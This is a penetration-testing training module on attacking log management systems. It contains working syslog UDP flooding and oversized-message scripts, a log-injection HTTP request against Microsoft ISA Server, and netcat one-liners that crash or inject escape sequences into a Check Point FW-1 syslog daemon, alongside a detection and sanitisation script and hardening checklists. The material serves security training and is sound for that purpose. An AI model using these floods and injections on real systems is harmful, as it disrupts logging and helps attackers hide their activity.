ECSA / LPT
EC-Council Module XXXV: Log Management Penetration Testing

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Penetration Testing Roadmap

Start Here
• Information Gathering
• Vulnerability Analysis
• External Penetration Testing
• Internal Network Penetration Testing
• Router and Switches Penetration Testing
• Firewall Penetration Testing
• IDS Penetration Testing
• Wireless Network Penetration Testing
• Denial of Service Penetration Testing
• Password Cracking Penetration Testing
• Social Engineering Penetration Testing
• Stolen Laptop, PDAs and Cell Phones Penetration Testing
• Application Penetration Testing
• Physical Security Penetration Testing
• Database Penetration Testing
• VoIP Penetration Testing
• VPN Penetration Testing
• War Dialing
• Virus and Trojan Detection
• Log Management Penetration Testing
• File Integrity Checking
• Blue Tooth and Hand held Device Penetration Testing
• Telecommunication and Broadband Communication Penetration Testing
• Email Security Penetration Testing
• Security Patches Penetration Testing
• Data Leakage Penetration Testing
End Here

Introduction

Log files maintain a record of the events occurring in an organization's systems and networks. Log management systems are used to collect, store and review log files across a network. Because threats against systems and networks have increased, and because the logs are what an investigation depends on, the security of the log management system itself must be raised accordingly.

Logs are classified into:
• Security software logs: records produced by security software (antivirus, intrusion detection/prevention, firewalls and similar products) about the events they detect and the actions they take.
• Operating system logs: system events and audit records produced by the operating system (logons, privilege use, service start/stop, changes to the audit log itself).

Need for Log Management

• To record each and every action performed on the system
• To ensure the recorded instances are stored for an appropriate duration
• To perform routine log review and analysis that helps to identify security threats, policy violations, operational problems, etc.
• To perform auditing and forensic analysis in the investigation of malicious activities

Operating system log entry example:

Event Type:     Success Audit
Event Source:   Security
Event Category: (1)
Event ID:       517
Date:           3/3/2008
Time:           4:30:40 PM
User:           NT AUTHORITY\SYSTEM
Computer:       KENT
Description:    The audit log was cleared
  Primary User Name: SYSTEM
  Primary Domain:    NT AUTHORITY
  Primary Logon ID:  (0x0,0x3F7)
  Client User Name:  userk
  Client Domain:     KENT
  Client Logon ID:   (0x0,0x28BFD)

This entry is worth singling out during log review: Event ID 517 is the "audit log was cleared" event on Windows 2000/XP/2003 (Event ID 1102 on Vista and later), and the Client User Name field identifies the account that requested the clearing (here userk), not the SYSTEM account that carried it out.

Challenges in Log Management

• Potential problems with the initial generation of logs
• Inconsistent log formats
• Confidentiality, integrity, and availability of generated logs
• Inaccuracy in the internal clock

Steps for Log Management Penetration Testing

1 • Scan for log files
2 • Try to flood Syslog servers with bogus log data
3 • Try a malicious Syslog message attack (buffer overflow)
4 • Perform a man-in-the-middle attack
5 • Check whether the logs are encrypted
6 • Check whether arbitrary data can be injected remotely into the Microsoft ISA Server log file
7 • Perform a DoS attack against the Check Point FW-1 Syslog daemon
8 • Send Syslog messages containing escape sequences to the Syslog daemon of Check Point FW-1 NG FP3

Step 1: Scan for Log Files

Use different scanning tools to locate and scan the log files on the system. Some of the log file scanning tools are:
• Sawmill
• Bcnumsg

Step 2: Try to Flood Syslog Servers with Bogus Log Data

Most syslog implementations use the connectionless, unreliable UDP to transfer logs between hosts. UDP provides no assurance that log entries will be received successfully or in the correct sequence.

Most syslog implementations do not perform any access control, so any host can send messages to a syslog server; because the UDP source address is never verified, the sender can also forge the apparent origin of the entries.

Check whether flooding causes a denial of service: dropped or reordered entries, a filled log partition, or a stalled daemon.

Step 3: Try a Malicious Syslog Message Attack (Buffer Overflow)

Construct a large syslog message with target-specific code at the end of the message.

If syslog messages are accepted from untrusted hosts, send messages of increasing length until a buffer overflow condition is found.

After a successful overflow, try to elevate a local user process to root privileges (syslog daemons have traditionally run as root).
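The probes in steps 2 and 3, as an added example that is not part of the EC-Council module: a small syslog UDP test client that builds RFC 3164-style datagrams, sends a burst of bogus entries, and sends one oversized message carrying a marker at its tail so the tester can tell from the receiver's log whether the size was handled, truncated, or dropped. The loopback sink exists only so the behaviour can be observed offline; the hostnames, tags, sizes and timestamp are constructed, and the oversized payload is plain padding rather than exploit code.

```python
# Added example: syslog UDP flood / oversized-message probe (steps 2 and 3).
import socket
from typing import List, Optional, Tuple

DEFAULT_TS = "Mar  3 16:30:40"  # constructed RFC 3164 timestamp (day is space-padded)


def build_syslog_message(facility: int, severity: int, hostname: str, tag: str,
                         msg: str, timestamp: str = DEFAULT_TS) -> bytes:
    """One RFC 3164 datagram: <PRI>TIMESTAMP HOSTNAME TAG: MSG, PRI = facility*8 + severity."""
    if not (0 <= facility <= 23 and 0 <= severity <= 7):
        raise ValueError("facility must be 0..23 and severity 0..7")
    pri = facility * 8 + severity
    return f"<{pri}>{timestamp} {hostname} {tag}: {msg}".encode("ascii")


def parse_pri(datagram: bytes) -> Tuple[int, int]:
    """Return (facility, severity) from the <PRI> prefix; raise ValueError if it is malformed."""
    if not datagram.startswith(b"<"):
        raise ValueError("missing PRI")
    end = datagram.find(b">", 1, 5)          # PRI is at most three digits
    if end == -1:
        raise ValueError("unterminated PRI")
    pri = int(datagram[1:end])
    if pri > 191:
        raise ValueError("PRI out of range")
    return pri // 8, pri % 8


def oversized_message(total_len: int, marker: bytes = b"END-OF-MSG") -> bytes:
    """Step 3 probe: exactly total_len bytes with a recognisable marker at the tail.
    Marker present in the receiver's log: the size was handled. Marker missing: truncated.
    No entry at all, or a dead daemon: that is where to look next."""
    head = build_syslog_message(1, 6, "evilhost", "probe", "")
    pad = total_len - len(head) - len(marker)
    if pad < 0:
        raise ValueError("total_len too small for the header plus marker")
    return head + b"A" * pad + marker


def flood(target: Tuple[str, int], count: int, size: Optional[int] = None) -> int:
    """Step 2: hand `count` datagrams to the kernel for `target`; returns how many were sent.
    UDP gives no delivery guarantee and stock syslog does no sender access control, so the
    receiving side has to be watched separately for dropped or reordered entries."""
    sent = 0
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        for i in range(count):
            payload = (build_syslog_message(1, 6, "evilhost", "flood", f"bogus entry {i}")
                       if size is None else oversized_message(size))
            s.sendto(payload, target)
            sent += 1
    return sent


class LoopbackSink:
    """Throwaway UDP receiver on 127.0.0.1, so the effect can be measured without a real server."""

    def __init__(self) -> None:
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.settimeout(0.2)
        self.addr: Tuple[str, int] = self.sock.getsockname()
        self.received: List[bytes] = []

    def drain(self) -> List[bytes]:
        while True:
            try:
                data, _ = self.sock.recvfrom(65535)
            except socket.timeout:
                return self.received
            self.received.append(data)

    def close(self) -> None:
        self.sock.close()


def run_loopback_demo(count: int = 100, size: int = 4096) -> dict:
    """Send a burst plus one oversized probe to a loopback sink and summarise what arrived."""
    sink = LoopbackSink()
    try:
        sent = flood(sink.addr, count) + flood(sink.addr, 1, size)
        got = sink.drain()
    finally:
        sink.close()
    big = [d for d in got if len(d) == size]
    return {
        "sent": sent,
        "received": len(got),
        "all_pri_valid": all(parse_pri(d) == (1, 6) for d in got),
        "oversized_intact": bool(big) and big[0].endswith(b"END-OF-MSG"),
    }


if __name__ == "__main__":
    print(run_loopback_demo())
```

Against a real target replace the sink address with the syslog host and port 514 and watch the receiver (its log file, disk usage and process state) rather than the sender: a flood that the kernel accepted locally tells you nothing about what the daemon kept.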
Step 4: Man-in-the-Middle Attack

Man-in-the-middle attacks can be used to modify or destroy syslog messages in transit.

Check whether the syslog client verifies the server's identity, as presented in the server's certificate, before sending log files.

Check the client's local ~/.ssh/known_hosts file if an SSH tunnel is used for log transmission.

Step 5: Check Whether the Logs are Encrypted

Most syslog implementations cannot use encryption to protect the integrity or confidentiality of logs in transit.

Sniff the network with sniffing tools such as Ethereal (now Wireshark) and SniffIt.

Try to monitor syslog messages containing sensitive information regarding system configurations and security...

Step 6: Check Whether Arbitrary Data Can Be Injected Remotely into the Microsoft ISA Server Log File (Only for Microsoft ISA Server)

Send a specially crafted HTTP request to modify the destination host parameter in the log file:

GET / HTTP/1.0
Host: %01%02%03%04
Transfer-Encoding: whatever

Step 7: Perform DoS Attack Against Check Point FW-1 Syslog Daemon (Only for Check Point FW-1 NG FP3)

• Enable the syslog daemon by enabling syslog reception on the firewall object
• Check for a listening syslog daemon
• Send a valid syslog message from a remote host
• Send a random payload via syslog message from a remote host:

[evilhost]# cat /dev/urandom | nc -u firewall 514

Step 8: Send Syslog Messages Containing Escape Sequences to the Syslog Daemon of Check Point FW-1 NG FP3

• Enable receiving of syslog messages from remote hosts on FW-1
• Send some special escape sequences via syslog:

[evilhost]# echo -e "19:00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER~ ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514

Checklist for Secure Log Management

• Maintain backups of log files
• Use updated versions of the software used for logging mechanisms
• Select secure log file locations
• Encrypt log files
• Store them on another host in order to stop tampering with log files
• Establish standard policies and procedures for log management
• Create and maintain a secure log management infrastructure

Checklist for Secure Log Management (cont'd)

• Train the personnel holding log management responsibilities
• Give limited access to log files
• Use a secure mechanism to transfer log files from one system to another
• Check the internal clock of the system

Summary

• Log files maintain a record of all the events occurring in an organization's systems and networks
• Logs are used to perform auditing and forensic analysis in the investigation of malicious activities
• Most syslog implementations use connectionless, unreliable UDP to transfer logs between hosts
• Use updated versions of the software used for logging mechanisms
• Check the internal clock of the system
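The injection probes of steps 6 and 8 side by side with the viewer-side check, as an added example that is not part of the EC-Council module. One function builds the ISA-style request whose percent-encoded Host header decodes to control bytes, another builds the datagram that the module's `echo -e ... | nc -u` command would put on the wire, and `find_injected_controls` / `render_for_terminal` are what a log review script or viewer should do with any untrusted entry before it reaches a terminal or a parser: flag control bytes and ANSI CSI sequences, and render every non-printable byte visibly instead of letting the terminal execute it. The sample log lines, hostnames and addresses are constructed, not captured from a real system.

```python
# Added example: crafting and neutralising control-character / escape-sequence log injection.
import re
from typing import List, Tuple
from urllib.parse import unquote_to_bytes


def isa_style_request(host_field: str = "%01%02%03%04") -> bytes:
    """Step 6 probe: HTTP/1.0 request whose Host header is percent-encoded control bytes."""
    return (f"GET / HTTP/1.0\r\nHost: {host_field}\r\n"
            f"Transfer-Encoding: whatever\r\n\r\n").encode("ascii")


def decoded_host(request: bytes) -> bytes:
    """Extract and percent-decode the Host header, i.e. what a logger recording the
    'destination host' field writes to disk if it does not sanitise it."""
    for hdr in request.split(b"\r\n"):
        if hdr.lower().startswith(b"host:"):
            return unquote_to_bytes(hdr[5:].strip())
    return b""


def escape_sequence_message() -> bytes:
    """Step 8 probe: the bytes the module's echo -e | nc -u pipeline sends (BEL, clear screen,
    blink, bright red foreground, then resets, and a trailing newline from echo)."""
    body = "19:00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER~ ATTACK\033[2;25m\033[22;30m\033[3q"
    return body.encode("latin-1") + b"\n"


# C0 control bytes (except TAB) plus DEL; CR/LF inside a record mean a forged line break.
CONTROL_RE = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")
# ANSI CSI sequences: ESC [ parameters, intermediates, final byte (e.g. ESC[2J, ESC[1;31m)
CSI_RE = re.compile(rb"\x1b\[[0-9;?]*[ -/]*[@-~]")


def find_injected_controls(line: bytes) -> List[Tuple[int, str]]:
    """Return (offset, description) for every CSI sequence or stray control byte in a record."""
    hits: List[Tuple[int, str]] = []
    csi_starts = set()
    for m in CSI_RE.finditer(line):
        csi_starts.add(m.start())
        hits.append((m.start(), "ansi_csi:" + m.group()[1:].decode("ascii")))
    for m in CONTROL_RE.finditer(line):
        if m.start() in csi_starts:      # the ESC that opens a CSI is already reported
            continue
        hits.append((m.start(), "control:0x%02x" % m.group()[0]))
    return sorted(hits)


def render_for_terminal(line: bytes) -> str:
    """Render a record so nothing in it is interpreted: bytes outside printable ASCII become
    \\xNN, and a literal backslash is doubled so an attacker cannot fake the escaping."""
    out = []
    for b in line:
        if b == 0x5C:
            out.append("\\\\")
        elif 0x20 <= b <= 0x7E:
            out.append(chr(b))
        else:
            out.append("\\x%02x" % b)
    return "".join(out)


def review(lines: List[bytes]) -> List[dict]:
    """Log review pass: one report entry per record, with findings and a safe rendering."""
    report = []
    for n, raw in enumerate(lines, 1):
        rec = raw.rstrip(b"\r\n")         # the record terminator itself is not an injection
        hits = find_injected_controls(rec)
        report.append({"line": n, "suspicious": bool(hits), "hits": hits,
                       "safe_view": render_for_terminal(rec)})
    return report


# Constructed sample log: a benign entry, an ISA-style proxy entry carrying the decoded
# Host value, and the raw step 8 datagram as a syslog server would store it.
SAMPLE_LOG = [
    b"Mar  3 16:30:40 kent sshd[412]: Accepted password for userk from 192.0.2.10 port 51514\n",
    b"Mar  3 16:31:02 isa w3proxy: 192.0.2.10 GET http://" + decoded_host(isa_style_request()) + b"/ 200\n",
    escape_sequence_message(),
]

if __name__ == "__main__":
    for entry in review(SAMPLE_LOG):
        print(entry["line"], "SUSPICIOUS" if entry["suspicious"] else "ok", entry["safe_view"])
        for offset, what in entry["hits"]:
            print("   offset", offset, what)
```

The detection side is deliberately strict: any C0 byte other than TAB in a single record is reported, because a legitimate syslog or proxy entry has no reason to contain BEL, CR, LF or ESC. The rendering side is the fix the module's step 8 implies for anything that displays logs: the escape sequences stay in the stored record as evidence, but the viewer shows them as text.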